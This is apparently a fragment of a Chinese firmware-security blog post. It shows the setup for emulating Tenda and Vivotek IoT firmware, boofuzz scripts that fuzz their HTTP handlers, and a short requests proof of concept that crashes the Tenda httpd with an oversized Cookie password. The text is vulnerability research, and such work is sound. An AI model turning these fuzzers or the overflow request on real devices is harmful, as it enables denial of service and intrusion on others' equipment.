一
正文
sudo git clone https://github.com/devttys0/sasquatch
cd sasquatch
sudo apt-get install build-essential liblzma-dev liblzo2-dev zlib1g-dev
./build.sh
find ./lib/ -name "*" | xargs grep 'check_network'
find ./lib/ -name "*" | xargs grep 'get_eth_name'
sudo tunctl -t br0 -u #用户名#
sudo ifconfig br0 192.168.10.1/24
from boofuzz import * IP = "10.10.10.1" #IP地址填自己的IP就好
PORT = 80def check_response(target, fuzz_data_logger, session, *args, **kwargs):
fuzz_data_logger.log_info("Checking test case response...")
try:
response = target.recv(512)
except:
fuzz_data_logger.log_fail("Unable to connect to target. Closing...")
target.close()
return#if empty response
if not response:
fuzz_data_logger.log_fail("Empty response, target may be hung. Closing...")
target.close()
return#remove everything after null terminator, and convert to string
#response = response[:response.index(0)].decode('utf-8')
fuzz_data_logger.log_info("response check...\n" + response.decode())
target.close()
returndef main():
'''
options = {
"start_commands": [
"sudo chroot /home/lys/Documents/IoT/firmware/_AC15_V15.03.1.16.bin.extracted/squashfs-root ./httpd"
],
"stop_commands": ["echo stopping"],
"proc_name": ["/usr/bin/qemu-arm-static ./httpd"]
}
procmon = ProcessMonitor("127.0.0.1", 26002)
procmon.set_options(**options)
'''session = Session(
target=Target(
connection=SocketConnection(IP, PORT, proto="tcp"),
# monitors=[procmon]
),
post_test_case_callbacks=[check_response],
)s_initialize(name="Request")
with s_block("Request-Line"):
# Line 1
s_group("Method", ["GET"])
s_delim(" ", fuzzable=False, name="space-1-1")
s_string("/goform/123", fuzzable=False) # fuzzable 1
s_delim(" ", fuzzable=False, name="space-1-2")
s_static("HTTP/1.1", name="HTTP_VERSION")
s_static("\r\n", name="Request-Line-CRLF-1")
# Line 2
s_static("Host")
s_delim(": ", fuzzable=False, name="space-2-1")
s_string("10.10.10.1", fuzzable=False, name="IP address")
s_static("\r\n", name="Request-Line-CRLF-2")
# Line 3
s_static("Connection")
s_delim(": ", fuzzable=False, name="space-3-1")
s_string("keep-alive", fuzzable=False, name="Connection state")
s_static("\r\n", name="Request-Line-CRLF-3")
# Line 4
s_static("Cookie")
s_delim(": ", fuzzable=False, name="space-4-1")
s_string("bLanguage", fuzzable=False, name="key-bLanguage")
s_delim("=", fuzzable=False)
s_string("en", fuzzable=False, name="value-bLanguage")
s_delim("; ", fuzzable=False)
s_string("password", fuzzable=False, name="key-password")
s_delim("=", fuzzable=False)
s_string("ce24124987jfjekfjlasfdjmeiruw398r", fuzzable=True) # fuzzable 2
s_static("\r\n", name="Request-Line-CRLF-4")
# over
s_static("\r\n")
s_static("\r\n")session.connect(s_get("Request"))
session.fuzz()if __name__ == "__main__":
main()
import requests ip = "10.10.10.1" #此处修改为自己的IP
url = "http://%s/goform/execCommand"%ip
cookie = {"Cookie":"password=" + "A"*1000}
ret = requests.get(url=url,cookies=cookie)
#print ret.text
_CC8160-VVTK-0100d.flash.pkg.extracted/_31.extracted/_rootfs.img.extracted/squashfs-root
from boofuzz import * IP = "127.0.0.1"
PORT = 80def check_response(target, fuzz_data_logger, session, *args, **kwargs):
fuzz_data_logger.log_info("Checking test case response...")
try:
response = target.recv(512)
except:
fuzz_data_logger.log_fail("Unable to connect to target. Closing...")
target.close()
return#if empty response
if not response:
fuzz_data_logger.log_fail("Empty response, target may be hung. Closing...")
target.close()
return#remove everything after null terminator, and convert to string
#response = response[:response.index(0)].decode('utf-8')
fuzz_data_logger.log_info("response check...\n" + response.decode())
target.close()
returndef main():
'''
options = {
"start_commands": [
"sudo chroot /home/lys/Documents/IoT/firmware/_AC15_V15.03.1.16.bin.extracted/squashfs-root ./httpd"
],
"stop_commands": ["echo stopping"],
"proc_name": ["/usr/bin/qemu-arm-static ./httpd"]
}
procmon = ProcessMonitor("127.0.0.1", 26002)
procmon.set_options(**options)
'''session = Session(
target=Target(
connection=SocketConnection(IP, PORT, proto="tcp"),
# monitors=[procmon]
),
post_test_case_callbacks=[check_response],
)s_initialize(name="Request")
with s_block("Request-Line"):
# Line 1
s_group("Method", ["POST"])
s_delim(" ", fuzzable=False, name="space-1-1")
s_string("/cgi-bin/admin/upgrade.cgi", fuzzable=False)
s_delim(" ", fuzzable=False, name="space-1-2")
s_static("HTTP/1.1",name="HTTP_VERSION")
s_static("\r\n", name="Request-Line-CRLF-1")
# Line 2
s_static("Content-Length")
s_delim(": ", fuzzable=False, name="space-2-1")
s_string("data", fuzzable=True)
s_static("\r\n")session.connect(s_get("Request"))
session.fuzz()if __name__ == "__main__":
main()
二
总结
https://xz.aliyun.com/t/5054?time__1311=n4%2BxnD07iti%3Dj2DBqooGkYLwq6DBDYTAD
https://www.anquanke.com/post/id/185336
https://blog.csdn.net/song_lee/article/details/113800058
看雪ID:pureGavin
https://bbs.kanxue.com/user-home-777502.htm
# 往期推荐
球分享
球点赞
球在看
点击阅读原文查看更多